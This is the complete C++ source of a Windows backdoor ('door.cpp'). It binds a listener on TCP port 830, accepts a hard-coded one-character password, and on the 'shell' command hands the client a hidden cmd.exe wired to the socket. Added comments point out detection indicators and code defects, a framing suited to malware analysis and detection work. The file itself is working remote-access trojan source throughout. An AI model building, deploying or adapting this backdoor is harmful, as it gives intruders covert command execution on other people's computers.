// door.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <stdio.h>
#include "stdafx.h"
#include <winsock2.h>
#pragma comment(lib,"Ws2_32")
// Forward declaration; door() is defined further down in this file.
void door();
// Console entry point. argc/argv are ignored: the program takes no
// configuration from the command line and immediately runs the listener in
// door(). door() only returns through its "exit" command branch, after which
// the process ends with status 0.
int main(int argc, char* argv[])
{
door();
return 0;
}
// Hard-coded TCP port that door() binds its listener to. For analysis and
// detection: a listener on this port (all interfaces, see door()) is a
// host/network indicator for this sample.
int port=830;
// Hard-coded access password, compared with strcmp() against the first line a
// client sends. It is a single character and is stored in clear text in the
// binary.
char pass[] = "j";
// Help text sent verbatim in reply to the "?" command. Together with the
// "shell>" and "Shell OK" literals in door(), these are static strings that
// can be matched in the binary or on the wire.
char g_helpmess[] = ""
"? --help\r\n"
"shell --get cmd shell\r\nquit --quit,can connect again\r\nexit --backdoor exit\r\n";
// Starts a "cmd" child process whose standard input, output and error are all
// the client socket, then blocks until that process ends.
//
// clientFD: the connected socket returned by accept() in door().
// Returns:  always 1; the CreateProcess result is stored in ret but never
//           examined, so callers cannot tell whether the process started.
//
// For defenders: what this produces is a cmd process with a hidden window
// (SW_HIDE) whose std handles are a network socket, created as a child of the
// listening process. Process-creation telemetry for that parent/child pair is
// the observable.
int cmdshell(SOCKET clientFD)
{
STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
// NOTE(review): si.cb is left at 0 by ZeroMemory and is never set to
// sizeof(si) in this block.
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
// The socket value is cast to a handle and used for all three std streams.
si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;
char cmdLine[] = "cmd";
PROCESS_INFORMATION ProcessInformation;
int ret;
// Fifth argument 1 is bInheritHandles = TRUE, so the child inherits the
// parent's inheritable handles, including the socket.
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
// NOTE(review): ret is not checked. If CreateProcess fails,
// ProcessInformation is uninitialized and the three calls below operate on an
// indeterminate handle value.
WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
// Called after the wait has returned, i.e. presumably on a process that has
// already exited.
TerminateProcess(ProcessInformation.hProcess, 0);
// Only hProcess is closed; ProcessInformation.hThread is never closed here.
CloseHandle(ProcessInformation.hProcess);
return 1;
}
// Password-gated TCP listener ("bind shell" backdoor) main loop.
//
// Binds a TCP socket to the global `port` on all interfaces, accepts one
// client at a time, reads newline-terminated lines from it and dispatches on
// the line text: the password in `pass`, then "?", "shell", "quit", "exit".
// Returns only when a client sends "exit".
//
// Review summary (all visible in the code below):
//  - No return value from WSAStartup/WSASocket/bind/listen/accept is checked.
//  - The password travels and is compared in clear text.
//  - The authenticated flag `passok` outlives the connection on the recv()
//    error path (see note at the password check).
//  - WSACleanup is never called.
void door()
{
// bool statulogin=false;
// Session state: true once a line equal to `pass` has been received.
bool passok=false;
WSADATA ws;
SOCKET listenFD;
// Buff receives one byte at a time; cmd accumulates the current line.
char Buff[1024],cmd[1024];
int ret;
unsigned long lBytesRead;
WSAStartup(MAKEWORD(2,2),&ws);
// Create the socket
//listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
listenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(port);
// ADDR_ANY: the listener is reachable on every local interface.
server.sin_addr.s_addr=ADDR_ANY;
// ret is overwritten by each call and never tested.
ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
ret=listen(listenFD,1);
int iAddrSize = sizeof(server);
// ag: re-entry point used after every disconnect; waits for the next client.
ag:
// The client address overwrites `server`; the result is not compared with
// INVALID_SOCKET.
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
// send(clientFD,"",sizeof(""),0);
while(1)
{
// cmd is cleared before each line, so it is always NUL-terminated even when
// the 256-byte cap below is hit without a line terminator.
ZeroMemory(cmd,1024);
lBytesRead = 0;
// Read one line, byte by byte, capped at 256 bytes (cmd holds 1024).
while(lBytesRead<256)
{
// NOTE(review): only SOCKET_ERROR is treated as a disconnect. A return of 0
// (peer closed the connection) is not handled; the loop then stores whatever
// Buff[0] currently holds and continues.
if(recv(clientFD,Buff,1,0)==SOCKET_ERROR)
{
closesocket(clientFD);
goto ag;
}
cmd[lBytesRead]=Buff[0];
// LF (0xa) or CR (0xd) ends the line and is replaced by the terminator.
if(Buff[0]==0xa || Buff[0]==0xd)
{
cmd[lBytesRead]=0;
break;
}
lBytesRead++;
}
// Check the password
// NOTE(review): passok is only cleared by the "quit" branch. The recv() error
// path above jumps to ag without resetting it, so a flag set by one session
// is still true when the next connection is accepted.
if(strcmp(cmd,pass) == 0 ){ passok=true;}
if(passok==true)
{}
else
{
closesocket(clientFD);
goto ag;
} // disconnect if the password is wrong
// Help message
// sizeof() on the array/literal includes the trailing NUL, so each send()
// below also transmits a zero byte.
if(strcmp(cmd,"?") == 0 && passok==true)
{
send(clientFD,g_helpmess,sizeof(g_helpmess),0);
}
// Get a cmd shell
// cmdshell() blocks until the spawned cmd process ends; the "Shell OK"
// message is sent only afterwards.
if(strcmp(cmd,"shell")==0 && passok==true)
{
cmdshell(clientFD);
send(clientFD,"Shell OK\n\r",sizeof("Shell OK\n\r"),0);
}
// Quit the trojan session; the client can connect again later
if(strcmp(cmd,"quit")==0 && passok==true)
{
passok=false;
closesocket(clientFD);
goto ag;
}
// Trojan exits the program
// Closes both the client and the listening socket, then leaves the loop.
if(strcmp(cmd,"exit")==0 && passok==true)
{
closesocket(clientFD);
closesocket(listenFD);
goto end;
}
// Prompt is sent after any non-empty line, including the password itself and
// unrecognized commands.
if(strlen(cmd) && passok==true)
send(clientFD,"shell>",sizeof("shell>"),0);
Sleep(10);
}
end:
;
// return 0;
}